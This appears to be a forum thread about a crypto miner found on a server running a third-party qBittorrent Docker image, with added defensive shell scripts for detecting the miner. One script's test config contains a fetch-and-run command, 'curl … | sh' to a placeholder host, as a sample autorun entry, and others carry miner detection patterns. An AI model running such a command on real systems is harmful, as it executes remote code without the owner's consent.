Crypto Miner in hotio/qbittorrent
41 comments · September 23, 2025 · thephyber
anotherlogin448
The comment was 100% in jest / sarcasm.
OP's system got compromised at some point; the images are clean.
Hell, if he didn't want to post clickbait, he could easily have verified with a clean image on a known clean system.
bakugo
Brand new account, 7 different comments on this post, all aggressively trying to discredit it.
A bit suspicious, don't you think?
remnant24
Nope. How else are they supposed to make comments if they didn't have an account here yet? I had to create this account just to answer you—is that suspicious too?
ponchel
Currently, on my own system, the docker container of qBittorrent definitely doesn't seem to use more resources than it should.
ktosobcy
Why use it when there is an official one: `https://github.com/qbittorrent/docker-qbittorrent-nox` ? o_O
Scion9066
Lack of a tagged stable/release version with libtorrent 2.0 for one.
dalmo3
It's a docker image, NOT qbittorrent.
thephyber
For clarity: The post is about a server running a 3rd party docker image of qbittorrent.
But there's no evidence presented that it was hotio's docker image on GHCR which was compromised, and there is reason to believe it might be an older, vulnerable version of qbittorrent in the docker image which was compromised.
The vulnerability: (credit crtasm)
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
aquova
hotio maintains a lot of Docker images. I suspect that if this is the case, there are a lot of people who would be affected
b-air
Finally made an account on hackernews for this after years of reading. I just checked my Unraid server, I'm running five docker containers from Hotio - Prowlarr, Sonarr, Radarr, Overseerr, and Tautulli. If I remember correctly, I originally chose Hotio's configs due to there being a few extra settings missing from the standard images in the Unraid store. This was all to avoid learning anything about docker at the time, but since then I've gained a few skills so I'd say it's time for me to set up the containers myself. Thanks for posting this, I really only read HN so I would have missed this if it were anywhere else.
anotherlogin448
There's no actual issue.
OP's system got compromised.
IlikeKitties
A lot around the ARR stack, which makes it likely to be used by many less knowledgeable users. Nice grift.
edit: it seems consensus in the thread that OP was pwned and the docker images are clean. Please accept my apologies hotio.
anotherlogin448
And that also goes to show how hilariously wrong OP is.
His system was compromised - hotio's containers are all clean
baobun
Supposedly this image.
https://github.com/hotio/qbittorrent/pkgs/container/qbittorr...
Based on https://github.com/hotio/base
Should be traceable via GitHub Actions logs for anyone signed on, if it is indeed supply-chain and not a qbittorrent exploit or something else.
anotherlogin448
Indeed. OP's investigation proves nothing other than that their device / system was compromised, and provides zero evidence that the container itself is the issue.
wok4899
Omg! I am one of the users! Good find. I mainly use it for the built-in VPN facility; gluetun does not cut it. But now it's time to re-think. I thought my 2000+ Linux ISOs were causing medium CPU usage. But still, lacking a GPU, on my Unraid server with 50+ docker containers running 24/7 the CPU load is 2.31 2.04 2.00, so I wonder if mining ever triggered?
PS. I do have such a binary on my machine as well:
`ps -ef | grep netservlet`
`root 3708105 3665360 0 08:06 pts/2 00:00:00 grep netservlet`
anotherlogin448
OP got compromised there's no issue in any hotio container.
Code and CI is all open source.
wok4899
I have never exposed this container to the world, and my server does report the existence of such a binary. That is the reason, based on CPU usage, I suspect that mining never triggered.
> `ps -ef | grep netservlet`
> `root 3708105 3665360 0 08:06 pts/2 00:00:00 grep netservlet`
thephyber
Edit: absolutely make sure you are running the newest version of the image. It patches security issues in the app.
Read this article:
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
It mentions the app will use UPnP to expose itself automatically.
Remember that the BitTorrent protocol is P2P, so it likely is accessible from the internet.
My suggestion is to wipe the image, pull and run the newest version, and change the admin credentials after it starts up.
iogjoertsnbu
That's just grep showing you your own grep process lol. You can do `ps -ef | grep foobarbaroof` and get the same thing...
bakugo
How long have you been running this container?
Can you check the contents of your qBittorrent.conf?
ZetaTauEpsilon
This output indicates the only process matching netservlet is your own grep, no?
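Added example, written for this page and not code from the thread or from hotio: why `ps -ef | grep netservlet` finds the grep itself, and the bracket trick that avoids it. A constructed stand-in for `ps -ef` replaces the real listing so the script runs offline; the PID columns and the `/tmp/netservlet.elf` process line are made up for the demonstration.

```shell
#!/bin/sh
# Constructed stand-in for `ps -ef`. $1 is the command line of the grep that
# is doing the searching: on a real host it appears in the listing because it
# is running at the moment ps samples the process table. $2 is an optional
# extra process line (empty on a clean host). Column values are made up.
fake_ps() {
    printf 'UID        PID    PPID  C STIME TTY          TIME CMD\n'
    printf 'root   3665360       1  0 08:00 pts/2    00:00:00 bash\n'
    printf 'root   3708105 3665360  0 08:06 pts/2    00:00:00 %s\n' "$1"
    [ -n "$2" ] && printf '%s\n' "$2"
    return 0
}

# Constructed process line standing in for an actually running miner.
MINER_LINE='root   3700001       1 99 07:55 ?        01:23:45 /tmp/netservlet.elf'

# Naive check: the searching grep's own command line is "grep netservlet",
# so the pattern matches at least once even when nothing else is running.
naive_count() {   # $1 = extra process line, "" for a clean host
    fake_ps "grep netservlet" "$1" | grep -c netservlet || true
}

# Bracket trick: the regex [n]etservlet still matches the text "netservlet",
# but grep's own command line now reads "grep [n]etservlet", which that regex
# does not match. On a real host: ps -ef | grep '[n]etservlet', or
# pgrep -af netservlet, which excludes itself.
bracket_count() { # $1 = extra process line, "" for a clean host
    fake_ps "grep [n]etservlet" "$1" | grep -c '[n]etservlet' || true
}

# Demonstration: clean host vs. host with the constructed miner line.
printf 'clean host    naive=%s bracket=%s\n' \
    "$(naive_count "")" "$(bracket_count "")"
printf 'miner running naive=%s bracket=%s\n' \
    "$(naive_count "$MINER_LINE")" "$(bracket_count "$MINER_LINE")"
```

The clean host yields one naive hit (the grep itself) and zero bracketed hits; with the constructed miner line present the bracketed count becomes one, which is the only number worth acting on.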
thephyber
Agree.
The article author searched netservlet for these strings to detect the infection:
> `$ strings /tmp/netservlet.elf | egrep -i 'stratum|pool|wallet|http|crypto|mining|eth|btc|pool'`
ZetaTauEpsilon
Yep. In the author's case it definitely seems they were infected, everything checks out there. I think this commenter however is mistaken when they say they also have the malicious executable discovered by the author. Investigation of my own image (not latest release but within the past few months) shows no evidence of what the author reports
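Added example, not from the article or the thread: the indicator-string search quoted above as a function that reads a binary on stdin and reports the distinct terms it finds, run over two constructed byte strings (not real samples). Terms like `http`, `pool`, `eth` and `crypto` also occur in ordinary networked binaries (libcrypto, thread pools), so the example treats only `stratum`, `wallet` and `mining` as strong signals; that split is this example's choice, not the article's.

```shell
#!/bin/sh
# Constructed stand-in for a miner binary: ELF magic, some NUL bytes, and the
# kind of strings a stratum miner carries. Not a real sample.
sample_miner() {
    printf '\177ELF\002\001\001\000\000\000'
    printf 'stratum+tcp://pool.example:3333\000'
    printf 'Mining thread started\000wallet=4ABC...\000'
}

# Constructed stand-in for a benign networked binary that still trips the
# weak terms in the article's pattern (http, libcrypto, threadpool).
sample_benign() {
    printf '\177ELF\002\001\001\000\000\000'
    printf 'http://example.com/\000libcrypto.so.3\000threadpool worker\000'
}

# Report every distinct indicator term found in the binary on stdin, in
# lowercase, space separated. -a forces grep to treat the file as text so -o
# prints the matches instead of "Binary file matches".
indicators() {
    grep -a -o -i -E 'stratum|pool|wallet|http|crypto|mining|eth|btc' \
        | tr 'A-Z' 'a-z' | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# Exit 0 only when a strong miner indicator is present. The weak terms are
# left out on purpose: they produce false positives on clean binaries.
is_suspicious() {
    grep -a -q -i -E 'stratum|wallet|mining'
}

# Demonstration against the two constructed samples. On a real host:
#   indicators < /tmp/netservlet.elf ; is_suspicious < /tmp/netservlet.elf
for name in sample_miner sample_benign; do
    printf '%-13s hits: %s\n' "$name" "$($name | indicators)"
    if $name | is_suspicious; then
        printf '%-13s strong indicator present\n' "$name"
    else
        printf '%-13s no strong indicator\n' "$name"
    fi
done
```

The benign sample produces three hits from the full pattern but none from the strong set; the miner sample produces both. Use the strong set to decide and the full list only as context.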
crtasm
If the web UI is exposed that could explain how it got infected:
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
tatoalo
In my case, the web UI was behind qBittorrent auth + Authelia; I haven't seen suspicious logs that would trace it back to that. Really interesting though!
bakugo
Can you check the contents of your qBittorrent.conf for any suspicious commands?
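Added example, not from the thread and not qBittorrent's own tooling: a check for commands stored in the `[AutoRun]` section of qBittorrent.conf, which is where the "run external program" setting lives (section and key names as in qBittorrent 4.x; verify against your version, since this is an assumption of the example). Both config snippets are constructed, and `example.invalid` is a placeholder host, not a real indicator.

```shell
#!/bin/sh
# Constructed qBittorrent.conf fragment with an AutoRun command set. The
# command and host are made up; the key names follow qBittorrent 4.x.
CONF_BAD='[AutoRun]
enabled=true
program=curl -fsSL http://example.invalid/x.sh | sh
[Preferences]
WebUI\Port=8080'

# Constructed clean fragment: AutoRun present but every program key empty.
CONF_CLEAN='[AutoRun]
enabled=false
program=
OnTorrentAdded\Enabled=false
OnTorrentAdded\Program=
[Preferences]
WebUI\Port=8080'

# Read a qBittorrent.conf on stdin and print every non-empty program entry in
# the [AutoRun] section as key=value. Matches both the classic "program" key
# and the newer "OnTorrentAdded\Program" key. Prints nothing when clean.
autorun_programs() {
    awk -F= '
        /^\[.*\]$/ { sec = substr($0, 2, length($0) - 2); next }
        sec == "AutoRun" && $1 ~ /(^|\\)[Pp]rogram$/ {
            val = $0; sub(/^[^=]*=/, "", val)
            if (val != "") print $1 "=" val
        }'
}

# Demonstration. On a real host, pipe the container's qBittorrent.conf into
# autorun_programs (the path inside the container depends on the image).
for name in CONF_BAD CONF_CLEAN; do
    eval "conf=\$$name"
    hits=$(printf '%s\n' "$conf" | autorun_programs)
    if [ -n "$hits" ]; then
        printf '%s: autorun command found: %s\n' "$name" "$hits"
    else
        printf '%s: no autorun command\n' "$name"
    fi
done
```

A non-empty result means qBittorrent will execute that command on torrent events regardless of whether the web UI is still reachable, so it deserves a look even on hosts where the miner process itself is no longer running.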
anotherlogin448
It's 100% your system that caused the issue not hotio's container and there is no miner that exists
Perhaps take a class in sarcasm?
2OEH8eoCRo0
Why do people use these stupid third-party container images?
anotherlogin448
And yet everything is open source and easily auditable. Most likely OP got pwned and clearly is unable to understand sarcasm.
You all really think that hotio snuck a crypto miner in somehow with all clearly open source code - and not a single person but OP noticed for years?
wok4899
With the SSH/NPM supply chain attacks, we all live in fear now. It just needs one very smart person to deploy such a hack. I'm not saying hotio did something; all I am saying is that with new information, we all should check our deployments. Along with OP I'm affected, even though I have never exposed the docker container to the world.
So we should not deny the possibility of something off here.
hedsick
You aren’t affected though… the output you posted clearly shows the only response to that process grep was your own grep…
jgilias
Well. An unpaid volunteer found a way to get paid!
/s
balamatom
Unironically this.
Monero is literally the only crypto that does what it says on the tin. Anonymous, decentralized, minable on commodity hardware. It basically solves internet micropayments.
If you run a website, instead of ads you could provide users with well-behaved "support this site by enabling cryptominer while browsing" toggle that defaults to off.
But no, that'd be "weird". Or in less gullible terms, it spooked some spooks (I mean in the Stirnerian sense, not the one the reader might be thinking of).
And, well, there you have it. 16 years after Satoshi, people patting themselves on the back, considering it a resounding success how BTC has become toothless enough for PayPal to adopt, ffs.
And as usual nobody putting 2 and 2 together till some hackers from some hellhole did.
And presumably some other big picture thinkers saw it, too, the ones in the opposite of a hellhole who poured literal billions to turn a global plea for financial liberty into the largest FUD cloud since the Halloween papers.
The article hasn’t proven that the infection is in the GHCR Docker image, let alone the newest version. It only says that they had the image installed, then (unknown time later) noticed the infection.
According to some messages on Hotio's Discord server from 2023-11-25, qBittorrent moved from fixed admin credentials to randomized at initialization. I think MrHotio's message about that crypto miner was likely a joke about people installing the older vulnerable version and the efficiency of unauthorized people installing xrig on servers with default credentials.
If the author was pinned to an old version of the docker image and their server had an internet-visible IP, they probably got their server infected because of weak security defaults in the app installed on the image.
Edit: Scion9066's comment shows that qBittorrent's previous release version patches multiple security bugs, so vulnerabilities might apply to all versions older than about 1 week, not my guess of 2 years.